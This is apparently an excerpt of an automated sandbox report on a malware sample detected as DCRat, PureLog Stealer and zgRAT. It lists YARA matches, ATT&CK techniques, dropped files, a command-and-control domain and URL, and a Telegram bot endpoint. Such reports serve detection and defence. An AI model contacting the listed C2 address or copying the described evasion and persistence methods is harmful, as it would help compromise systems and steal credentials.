                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeQueries volume information: C:\Program Files (x86)\Steam\steamclient.exe VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: steamclient.exe, 00000036.00000002.2349647262.0000000000966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: qNdO4D18CF.exe PID: 7436, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: steamclient.exe PID: 6624, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: qNdO4D18CF.exe PID: 7436, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: steamclient.exe PID: 6624, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.qNdO4D18CF.exe.1ae80000.25.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts141
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping2
                    File and Directory Discovery                    		1
                    Taint Shared Content                    		11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory34
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt21
                    Registry Run Keys / Startup Folder                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Obfuscated Files or Information                    		Security Account Manager24
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    File Deletion                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items32
                    Masquerading                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565523 Sample: qNdO4D18CF.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 90 390412cm.n9shteam.in 2->90 102 Multi AV Scanner detection for domain / URL 2->102 104 Suricata IDS alerts for network traffic 2->104 106 Antivirus detection for URL or domain 2->106 108 14 other signatures 2->108 8 qNdO4D18CF.exe 6 40 2->8         started        12 steamclient.exe 2->12         started        14 qNdO4D18CF.exe 2->14         started        16 6 other processes 2->16 signatures3 process4 file5 72 C:\Users\user\Desktop\zJmzvlwN.log, PE32 8->72 dropped 74 C:\Users\user\Desktop\yvDYLPoQ.log, PE32 8->74 dropped 82 26 other malicious files 8->82 dropped 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->110 112 Creates an undocumented autostart registry key 8->112 114 Creates multiple autostart registry keys 8->114 116 Adds a directory exclusion to Windows Defender 8->116 18 cmd.exe 8->18         started        21 csc.exe 4 8->21         started        24 powershell.exe 23 8->24         started        32 13 other processes 8->32 76 C:\Users\user\Desktop\yzXsqMXs.log, PE32 12->76 dropped 84 22 other malicious files 12->84 dropped 26 cmd.exe 12->26         started        78 C:\Users\user\Desktop\zplKRyKf.log, PE32 14->78 dropped 86 22 other malicious files 14->86 dropped 28 cmd.exe 14->28         started        80 C:\Users\user\Desktop\vvDaHluY.log, PE32 16->80 dropped 88 22 other malicious files 16->88 dropped 30 cmd.exe 16->30         started        signatures6 process7 file8 94 Uses ping.exe to sleep 18->94 96 Uses ping.exe to check the status of other devices and networks 18->96 44 4 other processes 18->44 70 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->70 dropped 98 Infects executable files (exe, dll, sys, html) 21->98 46 2 other processes 21->46 100 Loading BitLocker PowerShell Module 24->100 48 2 other processes 24->48 34 steamclient.exe 26->34         started        38 conhost.exe 26->38         started        40 qNdO4D18CF.exe 28->40         started        42 conhost.exe 28->42         started        50 2 other processes 30->50 52 13 other processes 32->52 signatures9 process10 dnsIp11 92 390412cm.n9shteam.in 172.66.0.102, 49742, 49790, 80 CLOUDFLARENETUS United States 34->92 54 C:\Users\user\Desktop\zdbaQHhe.log, PE32 34->54 dropped 56 C:\Users\user\Desktop\yxHkJcLm.log, PE32 34->56 dropped 58 C:\Users\user\Desktop\sOBLQjau.log, PE32 34->58 dropped 66 20 other malicious files 34->66 dropped 60 C:\Users\user\Desktop\sphCHAEj.log, PE32 40->60 dropped 62 C:\Users\user\Desktop\sIbCbYqd.log, PE32 40->62 dropped 64 C:\Users\user\Desktop\rLAuGYci.log, PE32 40->64 dropped 68 20 other malicious files 40->68 dropped file12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    qNdO4D18CF.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    qNdO4D18CF.exe100%AviraTR/Dropper.Gen
                    qNdO4D18CF.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\Steam\steamclient.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat100%AviraBAT/Delbat.C
                    C:\Program Files (x86)\Steam\steamclient.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Steam\steamclient.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Users\user\Desktop\AFZZLiTQ.log25%ReversingLabs
                    C:\Users\user\Desktop\AFZZLiTQ.log29%VirustotalBrowse
                    C:\Users\user\Desktop\BCBhhiiL.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\BCBhhiiL.log16%VirustotalBrowse
                    C:\Users\user\Desktop\BdpSDMGd.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\BdpSDMGd.log16%VirustotalBrowse
                    C:\Users\user\Desktop\BuRPCyHG.log8%ReversingLabs
                    C:\Users\user\Desktop\BuRPCyHG.log11%VirustotalBrowse
                    C:\Users\user\Desktop\BwVbAMfc.log4%ReversingLabs
                    C:\Users\user\Desktop\BwVbAMfc.log1%VirustotalBrowse
                    C:\Users\user\Desktop\BzfkqkWQ.log21%ReversingLabs
                    C:\Users\user\Desktop\CYASrcKR.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\CpOixJXm.log25%ReversingLabs
                    C:\Users\user\Desktop\CqvSLBwK.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\CufHpEgE.log29%ReversingLabs
                    C:\Users\user\Desktop\DfbAZvLY.log8%ReversingLabs
                    C:\Users\user\Desktop\DmprTJmg.log21%ReversingLabs
                    C:\Users\user\Desktop\EFxianyZ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\EhArHZqU.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\FsrYoeiE.log8%ReversingLabs
                    C:\Users\user\Desktop\GbyyMOOB.log21%ReversingLabs
                    C:\Users\user\Desktop\GeNRoyLy.log4%ReversingLabs
                    C:\Users\user\Desktop\GpTgJexz.log21%ReversingLabs
                    C:\Users\user\Desktop\Gumzpbgc.log29%ReversingLabs
                    C:\Users\user\Desktop\HLSRUZZF.log8%ReversingLabs
                    C:\Users\user\Desktop\HSbycbvE.log17%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    390412cm.n9shteam.in14%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://390412cm.n9shteam.in/ProviderImagepipeTopacketbaseuniversaldle.php100%Avira URL Cloudmalware
                    http://390412cm.n9shteam.in/ProviderImagepipeTopacketbaseuniversaldle.php5%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    390412cm.n9shteam.in
                    		172.66.0.102
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://390412cm.n9shteam.in/ProviderImagepipeTopacketbaseuniversaldle.phptrue
                    • 5%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/countryqNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drfalse
                      		high
                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.1989099278.0000017D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA84B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4D7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.00000150442E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8B962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB276E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780001000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/botqNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drfalse
                            		high
